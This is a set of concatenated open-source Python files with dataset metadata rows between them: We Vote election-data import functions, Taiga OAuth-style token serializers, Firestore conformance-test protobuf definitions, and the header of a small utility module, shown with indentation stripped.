# When we import from google, we link a google_civic_contest_office entry (with an internal id) to
# google_civic_candidate_campaign_entry
logger.debug("Retrieving google_civic_contest_office")
google_civic_contest_office_query = GoogleCivicContestOffice.objects.all()
google_civic_contest_office_query = google_civic_contest_office_query.filter(
id=google_civic_candidate_campaign_entry.google_civic_contest_office_id)
if len(google_civic_contest_office_query) == 1:
google_civic_contest_office_on_stage = google_civic_contest_office_query[0]
else:
logger.error("Single google_civic_contest_office NOT found")
return {
'error_result': True,
}
# Try to find earlier version based on the google_civic_election_id identifier
logger.debug("Retrieving contest_office")
contest_office_query = ContestOffice.objects.all()
contest_office_query = contest_office_query.filter(
google_civic_election_id=google_civic_contest_office_on_stage.google_civic_election_id)
contest_office_query = contest_office_query.filter(
district_name=google_civic_contest_office_on_stage.district_name)
contest_office_query = contest_office_query.filter(office_name=google_civic_contest_office_on_stage.office)
# TODO: If the 'office' text from Google Civic changes slightly, we would create a new ContestOffice entry
# (which would not be correct) Should we make this more robust and error-proof?
# Was at least one existing entry found based on the above criteria?
if len(contest_office_query):
contest_office_on_stage = contest_office_query[0]
contest_office_created = False
# TODO Update contest_office information here
elif len(contest_office_query) > 1:
# We have bad data - a duplicate
logger.error(u"We have bad data, a duplicate ContestOffice entry: {office}".format(
office=google_civic_contest_office_on_stage.office
))
return {
'error_result': True,
}
else:
# Create a new ContestOffice entry
logger.debug("Creating contest_office")
contest_office_on_stage = ContestOffice(
office_name=google_civic_contest_office_on_stage.office,
election_id=election_on_stage.id,
google_civic_election_id=google_civic_contest_office_on_stage.google_civic_election_id,
number_voting_for=google_civic_contest_office_on_stage.number_voting_for,
number_elected=google_civic_contest_office_on_stage.number_elected,
primary_party=google_civic_contest_office_on_stage.primary_party,
district_name=google_civic_contest_office_on_stage.district_name,
district_scope=google_civic_contest_office_on_stage.district_scope,
district_ocd_id=google_civic_contest_office_on_stage.district_ocd_id,
)
contest_office_on_stage.save()
contest_office_created = True
google_civic_contest_office_on_stage.we_vote_election_id = election_on_stage.id
google_civic_contest_office_on_stage.we_vote_contest_office_id = contest_office_on_stage.id
google_civic_contest_office_on_stage.save()
# Save the ballot_placement
# Try to find earlier version based on the google_civic_election_id identifier
logger.debug("Retrieving BallotItem")
ballot_item_query = BallotItem.objects.all()
ballot_item_query = ballot_item_query.filter(voter_id=1)
ballot_item_query = ballot_item_query.filter(
google_civic_election_id=google_civic_contest_office_on_stage.google_civic_election_id)
ballot_item_query = ballot_item_query.filter(contest_office_id=contest_office_on_stage.id)
if len(ballot_item_query) == 1:
ballot_item_on_stage = ballot_item_query[0]
ballot_item_on_stage_found = True
except Exception as e:
error_result = True
handle_record_not_found_exception(e, logger=logger)
try:
voter_id = 1
if value_exists(google_civic_contest_office_on_stage.ballot_placement):
# If the ballot order is specified by Google, use that.
local_ballot_order = google_civic_contest_office_on_stage.ballot_placement
else:
# Pull the ballot order from the
google_civic_ballot_item_manager = GoogleCivicBallotItemManager()
local_ballot_order = google_civic_ballot_item_manager.fetch_ballot_order(
voter_id, google_civic_contest_office_on_stage.google_civic_election_id,
google_civic_contest_office_on_stage.district_ocd_id)
if ballot_item_on_stage_found:
# Update the values
ballot_item_on_stage.election_id = election_on_stage.id
# TODO Add all values here
else:
logger.debug("Creating BallotItem")
ballot_item_on_stage = BallotItem(
voter_id=voter_id,
election_id=election_on_stage.id,
google_civic_election_id=google_civic_contest_office_on_stage.google_civic_election_id,
contest_office_id=contest_office_on_stage.id,
# contest_measure_id: Used for measures/referendum/initiatives
ballot_order=local_ballot_order,
ballot_item_label=google_civic_contest_office_on_stage.office,
)
ballot_item_on_stage.save()
except Exception as e:
error_result = True
handle_record_not_saved_exception(e, logger=logger)
results = {
'error_result': error_result,
'contest_office_on_stage': contest_office_on_stage,
'contest_office_created': contest_office_created,
}
return results
# END OF google_civic_get_or_create_contest_office
def google_civic_get_or_create_candidate_campaign_basic(google_civic_candidate_campaign_entry):
"""
Search the CandidateCampaign table to see if we already have an entry for this election
:param google_civic_candidate_campaign_entry:
:return:
"""
error_result = False
candidate_campaign_exists_locally = False
candidate_campaign_on_stage = CandidateCampaign()
candidate_campaign_created = False
politician_link_needed = True
try:
# Try to find earlier version based on the google_civic_election_id identifier
candidate_campaign_query = CandidateCampaign.objects.all()
candidate_campaign_query = candidate_campaign_query.filter(
google_civic_election_id__exact=google_civic_candidate_campaign_entry.google_civic_election_id)
# TODO: If the name from Google Civic changes slightly, we would create a new campaign entry
# (which would not be correct) We should make this more robust and error-proof
candidate_campaign_query = candidate_campaign_query.filter(
candidate_name__exact=google_civic_candidate_campaign_entry.name)
# Was at least one existing entry found based on the above criteria?
if len(candidate_campaign_query):
candidate_campaign_on_stage = candidate_campaign_query[0]
candidate_campaign_exists_locally = True
# Is a Politician linked to this candidate_campaign_on_stage
if candidate_campaign_on_stage.politician_id:
politician_link_needed = False
except Exception as e:
error_result = True
handle_record_not_found_exception(e, logger=logger)
if not candidate_campaign_exists_locally:
# An entry in the local CandidateCampaign table was not found
# ...so create a new entry
try:
candidate_campaign_on_stage = CandidateCampaign(
google_civic_election_id=google_civic_candidate_campaign_entry.google_civic_election_id,
candidate_name=google_civic_candidate_campaign_entry.name,
party=google_civic_candidate_campaign_entry.party,
)
candidate_campaign_on_stage.save()
candidate_campaign_created = True
except Exception as e:
error_result = True
handle_record_not_saved_exception(e, logger=logger)
results = {
'error_result': error_result,
'politician_link_needed': politician_link_needed,
'candidate_campaign_created': candidate_campaign_created,
'candidate_campaign_on_stage': candidate_campaign_on_stage,
}
return results
# END OF google_civic_get_or_create_candidate_campaign_basic
def google_civic_get_or_create_politician(google_civic_candidate_campaign_entry):
error_result = False
##########################
# Does this politician exist locally?
politician_on_stage = Politician()
politician_on_stage_found = False
first_name_guess = google_civic_candidate_campaign_entry.name.partition(' ')[0]
last_name_guess = google_civic_candidate_campaign_entry.name.partition(' ')[-1]
try:
logger.debug("We are searching based on full_name_google_civic")
query1 = Politician.objects.all()
query1 = query1.filter(full_name_google_civic=google_civic_candidate_campaign_entry.name)
# Was at least one existing entry found based on the above criteria?
if len(query1):
politician_on_stage = query1[0]
politician_on_stage_found = True
if len(query1) > 1:
# We have confusion, so skip processing this google_civic_candidate_campaign_entry
logger.warn("More than one Politician found (query1)")
else:
logger.warn(u"No politician found based on full_name_google_civic: {name}".format(
name=google_civic_candidate_campaign_entry.name
))
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
if not politician_on_stage_found:
# No entries were found, so we need to
# a) Search more deeply
# Searching based on full_name_assembled
logger.info(u"Searching against full_name_assembled: {name}".format(
name=google_civic_candidate_campaign_entry.name
))
# TODO DALE 2015-05-02 With this code, if we had imported a "Betty T. Yee" from another non-google-civic
# source (where full_name_google_civic was empty), we would create a second Politician entry. Fix this.
try:
politician_query_full_name_assembled = Politician.objects.all()
politician_query_full_name_assembled = politician_query_full_name_assembled.filter(
full_name_assembled=google_civic_candidate_campaign_entry.name)
if len(politician_query_full_name_assembled):
politician_on_stage = politician_query_full_name_assembled[0]
politician_on_stage_found = True
else:
logger.warn(u"No politician found based on full_name_assembled: {name}".format(
name=google_civic_candidate_campaign_entry.name
))
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
if not politician_on_stage_found:
# No entries were found, so we need to
# a) Search more deeply
logger.info(u"first_name_guess: {first_name_guess}, last_name_guess: {last_name_guess}".format(
first_name_guess=first_name_guess,
last_name_guess=last_name_guess
))
# TODO DALE 2015-05-02 With this code, if we had imported a "Betty T. Yee" from another non-google-civic
# source (where full_name_google_civic was empty), we would create a second Politician entry. Fix this.
try:
politician_query_first_last_guess = Politician.objects.all()
politician_query_first_last_guess = politician_query_first_last_guess.filter(first_name=first_name_guess)
politician_query_first_last_guess = politician_query_first_last_guess.filter(last_name=last_name_guess)
if len(politician_query_first_last_guess):
politician_on_stage = politician_query_first_last_guess[0]
politician_on_stage_found = True
else:
logger.warn(
"No politician found based on first_name_guess: {first_name} "\
"and last_name_guess: {last_name}".format(
first_name=first_name_guess,
last_name=last_name_guess
)
)
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
try:
if politician_on_stage_found:
# We found a match, and want to update the Politician data to match how Google Civic references the name
logger.debug("Store google_civic_candidate_campaign_entry.name in Politician.full_name_google_civic")
politician_on_stage.full_name_google_civic = google_civic_candidate_campaign_entry.name
else:
logger.debug("Create Politician entry: {name}".format(
name=google_civic_candidate_campaign_entry.name
))
politician_on_stage = Politician(
# Do not save first_name or last_name because middle initials will throw this off
last_name=last_name_guess,
first_name=first_name_guess,
full_name_google_civic=google_civic_candidate_campaign_entry.name,
)
politician_on_stage.save()
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
if error_result:
logger.error("There was an error trying to create a politician")
else:
logger.debug("It seems we have found a politician: {display_full_name}".format(
display_full_name=politician_on_stage.display_full_name()
))
results = {
'error_result': error_result,
'politician_on_stage': politician_on_stage,
}
return results
WE_VOTE_API_KEY = get_environment_variable("WE_VOTE_API_KEY")
ORGANIZATIONS_URL = get_environment_variable("ORGANIZATIONS_URL")
ORGANIZATIONS_JSON_FILE = get_environment_variable("ORGANIZATIONS_JSON_FILE")
CANDIDATE_CAMPAIGNS_URL = get_environment_variable("CANDIDATE_CAMPAIGNS_URL")
CANDIDATE_CAMPAIGNS_JSON_FILE = get_environment_variable("CANDIDATE_CAMPAIGNS_JSON_FILE")
POSITIONS_URL = get_environment_variable("POSITIONS_URL")
POSITIONS_JSON_FILE = get_environment_variable("POSITIONS_JSON_FILE")
# TODO DALE Get this working
def import_we_vote_organizations_from_json(request, load_from_uri=False):
"""
Get the json data, and either create new entries or update existing
:return:
"""
if load_from_uri:
# Request json file from We Vote servers
logger.info("Loading Organizations from We Vote Master servers")
request = requests.get(ORGANIZATIONS_URL, params={
"key": WE_VOTE_API_KEY, # This comes from an environment variable
})
structured_json = json.loads(request.text)
else:
# Load saved json from local file
logger.info("Loading organizations from local file")
with open(ORGANIZATIONS_JSON_FILE) as json_data:
structured_json = json.load(json_data)
for one_organization in structured_json:
logger.debug(
u"id_we_vote: {id_we_vote}, name: {name}, url: {url}".format(**one_organization)
)
# Make sure we have the minimum required variables
if len(one_organization["id_we_vote"]) == 0 or len(one_organization["name"]) == 0:
continue
# Check to see if this organization is already being used anywhere
organization_on_stage_found = False
try:
if len(one_organization["id_we_vote"]) > 0:
organization_query = Organization.objects.filter(id_we_vote=one_organization["id_we_vote"])
if len(organization_query):
organization_on_stage = organization_query[0]
organization_on_stage_found = True
elif len(one_organization["name"]) > 0:
organization_query = Organization.objects.filter(name=one_organization["name"])
if len(organization_query):
organization_on_stage = organization_query[0]
organization_on_stage_found = True
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
try:
if organization_on_stage_found:
# Update
organization_on_stage.id_we_vote = one_organization["id_we_vote"]
organization_on_stage.name = one_organization["name"]
organization_on_stage.url = one_organization["url"]
organization_on_stage.save()
messages.add_message(request, messages.INFO, u"Organization updated: {name}".format(
name=one_organization["name"]))
else:
# Create new
organization_on_stage = Organization(
id_we_vote=one_organization["id_we_vote"],
name=one_organization["name"],
url=one_organization["url"],
)
organization_on_stage.save()
messages.add_message(request, messages.INFO, u"New organization imported: {name}".format(
name=one_organization["name"]))
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
messages.add_message(
request, messages.ERROR,
u"Could not save Organization, id_we_vote: {id_we_vote}, name: {name}, url: {url}".format(
id_we_vote=one_organization["id_we_vote"],
name=one_organization["name"],
url=one_organization["url"],))
def import_we_vote_candidate_campaigns_from_json(request, load_from_uri=False):
"""
Get the json data, and either create new entries or update existing
:return:
"""
if load_from_uri:
# Request json file from We Vote servers
messages.add_message(request, messages.INFO, "Loading CandidateCampaign IDs from We Vote Master servers")
request = requests.get(CANDIDATE_CAMPAIGNS_URL, params={
"key": WE_VOTE_API_KEY, # This comes from an environment variable
})
structured_json = json.loads(request.text)
else:
# Load saved json from local file
messages.add_message(request, messages.INFO, "Loading CandidateCampaigns IDs from local file")
with open(CANDIDATE_CAMPAIGNS_JSON_FILE) as json_data:
structured_json = json.load(json_data)
for one_candidate_campaign in structured_json:
# For now we are only adding a We Vote ID so we can save Positions
candidate_campaign_on_stage_found = False
try:
if len(one_candidate_campaign["candidate_name"]) > 0:
candidate_campaign_query = CandidateCampaign.objects.filter(
candidate_name=one_candidate_campaign["candidate_name"])
if len(candidate_campaign_query) == 1: # Make sure only one found
candidate_campaign_on_stage = candidate_campaign_query[0]
candidate_campaign_on_stage_found = True
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
try:
if candidate_campaign_on_stage_found:
# Update
candidate_campaign_on_stage.id_we_vote = one_candidate_campaign["id_we_vote"]
candidate_campaign_on_stage.save()
messages.add_message(request, messages.INFO, u"CandidateCampaign updated: {candidate_name}".format(
candidate_name=one_candidate_campaign["candidate_name"]))
else:
messages.add_message(request, messages.ERROR, u"CandidateCampaign not found: {candidate_name}".format(
candidate_name=one_candidate_campaign["candidate_name"]))
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
messages.add_message(request, messages.ERROR,
u"Could not save CandidateCampaign, id_we_vote: {id_we_vote}, "
u"candidate_name: {candidate_name}, ".format(
id_we_vote=one_candidate_campaign["id_we_vote"],
candidate_name=one_candidate_campaign["candidate_name"],))
def import_we_vote_positions_from_json(request, load_from_uri=False):
"""
Get the json data, and either create new entries or update existing
:return:
"""
if load_from_uri:
# Request json file from We Vote servers
messages.add_message(request, messages.INFO, "Loading positions from We Vote Master servers")
request = requests.get(POSITIONS_URL, params={
"key": WE_VOTE_API_KEY, # This comes from an environment variable
})
structured_json = json.loads(request.text)
else:
# Load saved json from local file
messages.add_message(request, messages.INFO, "Loading positions from local file")
with open(POSITIONS_JSON_FILE) as json_data:
structured_json = json.load(json_data)
for one_position in structured_json:
# Make sure we have the minimum required variables
if len(one_position["id_we_vote"]) == 0 \
or len(one_position["organization_id_we_vote"]) == 0\
or len(one_position["candidate_campaign_id_we_vote"]) == 0:
continue
# Check to see if this position is already being used anywhere
position_on_stage_found = False
try:
if len(one_position["id_we_vote"]) > 0:
position_query = PositionEntered.objects.filter(id_we_vote=one_position["id_we_vote"])
if len(position_query):
position_on_stage = position_query[0]
position_on_stage_found = True
except PositionEntered.DoesNotExist as e:
pass
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
# We need to look up the local organization_id based on the newly saved we_vote_id
organization_manager = OrganizationManager()
organization_id = organization_manager.fetch_organization_id(one_position["organization_id_we_vote"])
# We need to look up the local candidate_campaign_id
candidate_campaign_manager = CandidateCampaignManager()
candidate_campaign_id = candidate_campaign_manager.fetch_candidate_campaign_id_from_id_we_vote(
one_position["candidate_campaign_id_we_vote"])
# TODO We need to look up measure_campaign_id
measure_campaign_id = 0
try:
if position_on_stage_found:
# Update
position_on_stage.id_we_vote = one_position["id_we_vote"]
position_on_stage.organization_id = organization_id
position_on_stage.candidate_campaign_id = candidate_campaign_id
position_on_stage.measure_campaign_id = measure_campaign_id
position_on_stage.date_entered = one_position["date_entered"]
position_on_stage.election_id = one_position["election_id"]
position_on_stage.stance = one_position["stance"]
position_on_stage.more_info_url = one_position["more_info_url"]
position_on_stage.statement_text = one_position["statement_text"]
position_on_stage.statement_html = one_position["statement_html"]
position_on_stage.save()
messages.add_message(request, messages.INFO, u"Position updated: {id_we_vote}".format(
id_we_vote=one_position["id_we_vote"]))
else:
# Create new
position_on_stage = PositionEntered(
id_we_vote=one_position["id_we_vote"],
organization_id=organization_id,
candidate_campaign_id=candidate_campaign_id,
measure_campaign_id=measure_campaign_id,
date_entered=one_position["date_entered"],
election_id=one_position["election_id"],
stance=one_position["stance"],
more_info_url=one_position["more_info_url"],
statement_text=one_position["statement_text"],
statement_html=one_position["statement_html"],
)
position_on_stage.save()
messages.add_message(request, messages.INFO, u"New position imported: {id_we_vote}".format(
id_we_vote=one_position["id_we_vote"]))
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
messages.add_message(request, messages.ERROR,
u"Could not save position, id_we_vote: {id_we_vote}, "
u"organization_id_we_vote: {organization_id_we_vote}, "
u"candidate_campaign_id_we_vote: {candidate_campaign_id_we_vote}".format(
id_we_vote=one_position["id_we_vote"],
organization_id_we_vote=one_position["organization_id_we_vote"],
candidate_campaign_id_we_vote=one_position["candidate_campaign_id_we_vote"],
))
| mit | -4,914,318,572,167,736,000 | 49.581457 | 118 | 0.620152 | false |
bdang2012/taiga-back-casting | taiga/external_apps/serializers.py | 1 | 2126 | # Copyright (C) 2014-2015 Andrey Antukh <[email protected]>
# Copyright (C) 2014-2015 Jesús Espino <[email protected]>
# Copyright (C) 2014-2015 David Barragán <[email protected]>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import json
from taiga.base.api import serializers
from . import models
from . import services
from django.utils.translation import ugettext as _
class ApplicationSerializer(serializers.ModelSerializer):
class Meta:
model = models.Application
fields = ("id", "name", "web", "description", "icon_url")
class ApplicationTokenSerializer(serializers.ModelSerializer):
cyphered_token = serializers.CharField(source="cyphered_token", read_only=True)
next_url = serializers.CharField(source="next_url", read_only=True)
application = ApplicationSerializer(read_only=True)
class Meta:
model = models.ApplicationToken
fields = ("user", "id", "application", "auth_code", "next_url")
class AuthorizationCodeSerializer(serializers.ModelSerializer):
next_url = serializers.CharField(source="next_url", read_only=True)
class Meta:
model = models.ApplicationToken
fields = ("auth_code", "state", "next_url")
class AccessTokenSerializer(serializers.ModelSerializer):
cyphered_token = serializers.CharField(source="cyphered_token", read_only=True)
next_url = serializers.CharField(source="next_url", read_only=True)
class Meta:
model = models.ApplicationToken
fields = ("cyphered_token", )
| agpl-3.0 | -6,451,691,023,716,321,000 | 36.928571 | 83 | 0.733992 | false |
googleapis/python-firestore | tests/unit/v1/conformance_tests.py | 1 | 14551 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.cloud.firestore_v1.types import common
from google.cloud.firestore_v1.types import document
from google.cloud.firestore_v1.types import firestore
from google.cloud.firestore_v1.types import query as gcf_query
from google.protobuf import timestamp_pb2 as timestamp # type: ignore
__protobuf__ = proto.module(
package="tests.unit.v1",
manifest={
"TestFile",
"Test",
"GetTest",
"CreateTest",
"SetTest",
"UpdateTest",
"UpdatePathsTest",
"DeleteTest",
"SetOption",
"QueryTest",
"Clause",
"Select",
"Where",
"OrderBy",
"Cursor_",
"DocSnapshot",
"FieldPath",
"ListenTest",
"Snapshot",
"DocChange",
},
)
class TestFile(proto.Message):
r"""A collection of tests.
Attributes:
tests (Sequence[google.cloud.firestore_v1.types.Test]):
"""
tests = proto.RepeatedField(proto.MESSAGE, number=1, message="Test",)
class Test(proto.Message):
r"""A Test describes a single client method call and its expected
result.
Attributes:
description (str):
short description of the test
comment (str):
a comment describing the behavior being
tested
get (google.cloud.firestore_v1.types.GetTest):
create (google.cloud.firestore_v1.types.CreateTest):
set_ (google.cloud.firestore_v1.types.SetTest):
update (google.cloud.firestore_v1.types.UpdateTest):
update_paths (google.cloud.firestore_v1.types.UpdatePathsTest):
delete (google.cloud.firestore_v1.types.DeleteTest):
query (google.cloud.firestore_v1.types.QueryTest):
listen (google.cloud.firestore_v1.types.ListenTest):
"""
description = proto.Field(proto.STRING, number=1)
comment = proto.Field(proto.STRING, number=10)
get = proto.Field(proto.MESSAGE, number=2, oneof="test", message="GetTest",)
create = proto.Field(proto.MESSAGE, number=3, oneof="test", message="CreateTest",)
set_ = proto.Field(proto.MESSAGE, number=4, oneof="test", message="SetTest",)
update = proto.Field(proto.MESSAGE, number=5, oneof="test", message="UpdateTest",)
update_paths = proto.Field(
proto.MESSAGE, number=6, oneof="test", message="UpdatePathsTest",
)
delete = proto.Field(proto.MESSAGE, number=7, oneof="test", message="DeleteTest",)
query = proto.Field(proto.MESSAGE, number=8, oneof="test", message="QueryTest",)
listen = proto.Field(proto.MESSAGE, number=9, oneof="test", message="ListenTest",)
class GetTest(proto.Message):
r"""Call to the DocumentRef.Get method.
Attributes:
doc_ref_path (str):
The path of the doc, e.g.
"projects/projectID/databases/(default)/documents/C/d".
request (google.cloud.firestore_v1.types.GetDocumentRequest):
The request that the call should send to the
Firestore service.
"""
doc_ref_path = proto.Field(proto.STRING, number=1)
request = proto.Field(
proto.MESSAGE, number=2, message=firestore.GetDocumentRequest,
)
class CreateTest(proto.Message):
r"""Call to DocumentRef.Create.
Attributes:
doc_ref_path (str):
The path of the doc, e.g.
"projects/projectID/databases/(default)/documents/C/d".
json_data (str):
The data passed to Create, as JSON. The
strings "Delete" and "ServerTimestamp" denote
the two special sentinel values. Values that
could be interpreted as integers (i.e. digit
strings) should be treated as integers.
request (google.cloud.firestore_v1.types.CommitRequest):
The request that the call should generate.
is_error (bool):
If true, the call should result in an error
without generating a request. If this is true,
request should not be set.
"""
doc_ref_path = proto.Field(proto.STRING, number=1)
json_data = proto.Field(proto.STRING, number=2)
request = proto.Field(proto.MESSAGE, number=3, message=firestore.CommitRequest,)
is_error = proto.Field(proto.BOOL, number=4)
class SetTest(proto.Message):
r"""A call to DocumentRef.Set.
Attributes:
doc_ref_path (str):
path of doc
option (google.cloud.firestore_v1.types.SetOption):
option to the Set call, if any
json_data (str):
data (see CreateTest.json_data)
request (google.cloud.firestore_v1.types.CommitRequest):
expected request
is_error (bool):
call signals an error
"""
doc_ref_path = proto.Field(proto.STRING, number=1)
option = proto.Field(proto.MESSAGE, number=2, message="SetOption",)
json_data = proto.Field(proto.STRING, number=3)
request = proto.Field(proto.MESSAGE, number=4, message=firestore.CommitRequest,)
is_error = proto.Field(proto.BOOL, number=5)
class UpdateTest(proto.Message):
r"""A call to the form of DocumentRef.Update that represents the
data as a map or dictionary.
Attributes:
doc_ref_path (str):
path of doc
precondition (google.cloud.firestore_v1.types.Precondition):
precondition in call, if any
json_data (str):
data (see CreateTest.json_data)
request (google.cloud.firestore_v1.types.CommitRequest):
expected request
is_error (bool):
call signals an error
"""
doc_ref_path = proto.Field(proto.STRING, number=1)
precondition = proto.Field(proto.MESSAGE, number=2, message=common.Precondition,)
json_data = proto.Field(proto.STRING, number=3)
request = proto.Field(proto.MESSAGE, number=4, message=firestore.CommitRequest,)
is_error = proto.Field(proto.BOOL, number=5)
class UpdatePathsTest(proto.Message):
r"""A call to the form of DocumentRef.Update that represents the
data as a list of field paths and their values.
Attributes:
doc_ref_path (str):
path of doc
precondition (google.cloud.firestore_v1.types.Precondition):
precondition in call, if any
field_paths (Sequence[google.cloud.firestore_v1.types.FieldPath]):
parallel sequences: field_paths[i] corresponds to
json_values[i]
json_values (Sequence[str]):
the argument values, as JSON
request (google.cloud.firestore_v1.types.CommitRequest):
expected rquest
is_error (bool):
call signals an error
"""
doc_ref_path = proto.Field(proto.STRING, number=1)
precondition = proto.Field(proto.MESSAGE, number=2, message=common.Precondition,)
field_paths = proto.RepeatedField(proto.MESSAGE, number=3, message="FieldPath",)
json_values = proto.RepeatedField(proto.STRING, number=4)
request = proto.Field(proto.MESSAGE, number=5, message=firestore.CommitRequest,)
is_error = proto.Field(proto.BOOL, number=6)
class DeleteTest(proto.Message):
r"""A call to DocmentRef.Delete
Attributes:
doc_ref_path (str):
path of doc
precondition (google.cloud.firestore_v1.types.Precondition):
request (google.cloud.firestore_v1.types.CommitRequest):
expected rquest
is_error (bool):
call signals an error
"""
doc_ref_path = proto.Field(proto.STRING, number=1)
precondition = proto.Field(proto.MESSAGE, number=2, message=common.Precondition,)
request = proto.Field(proto.MESSAGE, number=3, message=firestore.CommitRequest,)
is_error = proto.Field(proto.BOOL, number=4)
class SetOption(proto.Message):
r"""An option to the DocumentRef.Set call.
Attributes:
all_ (bool):
if true, merge all fields ("fields" is
ignored).
fields (Sequence[google.cloud.firestore_v1.types.FieldPath]):
field paths for a Merge option
"""
all_ = proto.Field(proto.BOOL, number=1)
fields = proto.RepeatedField(proto.MESSAGE, number=2, message="FieldPath",)
class QueryTest(proto.Message):
r"""
Attributes:
coll_path (str):
path of collection, e.g.
"projects/projectID/databases/(default)/documents/C".
clauses (Sequence[google.cloud.firestore_v1.types.Clause]):
query (google.cloud.firestore_v1.types.StructuredQuery):
is_error (bool):
"""
coll_path = proto.Field(proto.STRING, number=1)
clauses = proto.RepeatedField(proto.MESSAGE, number=2, message="Clause",)
query = proto.Field(proto.MESSAGE, number=3, message=gcf_query.StructuredQuery,)
is_error = proto.Field(proto.BOOL, number=4)
class Clause(proto.Message):
r"""
Attributes:
select (google.cloud.firestore_v1.types.Select):
where (google.cloud.firestore_v1.types.Where):
order_by (google.cloud.firestore_v1.types.OrderBy):
offset (int):
limit (int):
start_at (google.cloud.firestore_v1.types.Cursor_):
start_after (google.cloud.firestore_v1.types.Cursor_):
end_at (google.cloud.firestore_v1.types.Cursor_):
end_before (google.cloud.firestore_v1.types.Cursor_):
"""
select = proto.Field(proto.MESSAGE, number=1, oneof="clause", message="Select",)
where = proto.Field(proto.MESSAGE, number=2, oneof="clause", message="Where",)
order_by = proto.Field(proto.MESSAGE, number=3, oneof="clause", message="OrderBy",)
offset = proto.Field(proto.INT32, number=4, oneof="clause")
limit = proto.Field(proto.INT32, number=5, oneof="clause")
start_at = proto.Field(proto.MESSAGE, number=6, oneof="clause", message="Cursor_",)
start_after = proto.Field(
proto.MESSAGE, number=7, oneof="clause", message="Cursor_",
)
end_at = proto.Field(proto.MESSAGE, number=8, oneof="clause", message="Cursor_",)
end_before = proto.Field(
proto.MESSAGE, number=9, oneof="clause", message="Cursor_",
)
class Select(proto.Message):
r"""
Attributes:
fields (Sequence[google.cloud.firestore_v1.types.FieldPath]):
"""
fields = proto.RepeatedField(proto.MESSAGE, number=1, message="FieldPath",)
class Where(proto.Message):
r"""
Attributes:
path (google.cloud.firestore_v1.types.FieldPath):
op (str):
json_value (str):
"""
path = proto.Field(proto.MESSAGE, number=1, message="FieldPath",)
op = proto.Field(proto.STRING, number=2)
json_value = proto.Field(proto.STRING, number=3)
class OrderBy(proto.Message):
r"""
Attributes:
path (google.cloud.firestore_v1.types.FieldPath):
direction (str):
"asc" or "desc".
"""
path = proto.Field(proto.MESSAGE, number=1, message="FieldPath",)
direction = proto.Field(proto.STRING, number=2)
class Cursor_(proto.Message):
r"""
Attributes:
doc_snapshot (google.cloud.firestore_v1.types.DocSnapshot):
one of:
json_values (Sequence[str]):
"""
doc_snapshot = proto.Field(proto.MESSAGE, number=1, message="DocSnapshot",)
json_values = proto.RepeatedField(proto.STRING, number=2)
class DocSnapshot(proto.Message):
r"""
Attributes:
path (str):
json_data (str):
"""
path = proto.Field(proto.STRING, number=1)
json_data = proto.Field(proto.STRING, number=2)
class FieldPath(proto.Message):
r"""
Attributes:
field (Sequence[str]):
"""
field = proto.RepeatedField(proto.STRING, number=1)
class ListenTest(proto.Message):
r"""A test of the Listen streaming RPC (a.k.a. FireStore watch). If the
sequence of responses is provided to the implementation, it should
produce the sequence of snapshots. If is_error is true, an error
should occur after the snapshots.
The tests assume that the query is
Collection("projects/projectID/databases/(default)/documents/C").OrderBy("a",
Ascending)
The watch target ID used in these tests is 1. Test interpreters
should either change their client's ID for testing, or change the ID
in the tests before running them.
Attributes:
responses (Sequence[google.cloud.firestore_v1.types.ListenResponse]):
snapshots (Sequence[google.cloud.firestore_v1.types.Snapshot]):
is_error (bool):
"""
responses = proto.RepeatedField(
proto.MESSAGE, number=1, message=firestore.ListenResponse,
)
snapshots = proto.RepeatedField(proto.MESSAGE, number=2, message="Snapshot",)
is_error = proto.Field(proto.BOOL, number=3)
class Snapshot(proto.Message):
r"""
Attributes:
docs (Sequence[google.cloud.firestore_v1.types.Document]):
changes (Sequence[google.cloud.firestore_v1.types.DocChange]):
read_time (google.protobuf.timestamp_pb2.Timestamp):
"""
docs = proto.RepeatedField(proto.MESSAGE, number=1, message=document.Document,)
changes = proto.RepeatedField(proto.MESSAGE, number=2, message="DocChange",)
read_time = proto.Field(proto.MESSAGE, number=3, message=timestamp.Timestamp,)
class DocChange(proto.Message):
r"""
Attributes:
kind (google.cloud.firestore_v1.types.DocChange.Kind):
doc (google.cloud.firestore_v1.types.Document):
old_index (int):
new_index (int):
"""
class Kind(proto.Enum):
r""""""
KIND_UNSPECIFIED = 0
ADDED = 1
REMOVED = 2
MODIFIED = 3
kind = proto.Field(proto.ENUM, number=1, enum=Kind,)
doc = proto.Field(proto.MESSAGE, number=2, message=document.Document,)
old_index = proto.Field(proto.INT32, number=3)
new_index = proto.Field(proto.INT32, number=4)
__all__ = tuple(sorted(__protobuf__.manifest))
| apache-2.0 | 2,782,277,068,443,814,000 | 26.403013 | 87 | 0.647447 | false |
9wfox/mvc | utility.py | 1 | 6713 | # -*- coding:utf-8 -*-
"""
工具
历史:
2011-08-03 + 重构 get_pys_members。
2011-08-15 * 修改 con_mongo_object,支持 objectid。
2011-08-20 + 增加 template_path, static_path。
2011-08-25 * 将参数检查函数从 loigc 转移过来。
2011-08-27 * 重构 get_pys_members,改名 get_members。
"""
from datetime import datetime
from sys import argv
from os import walk, listdir
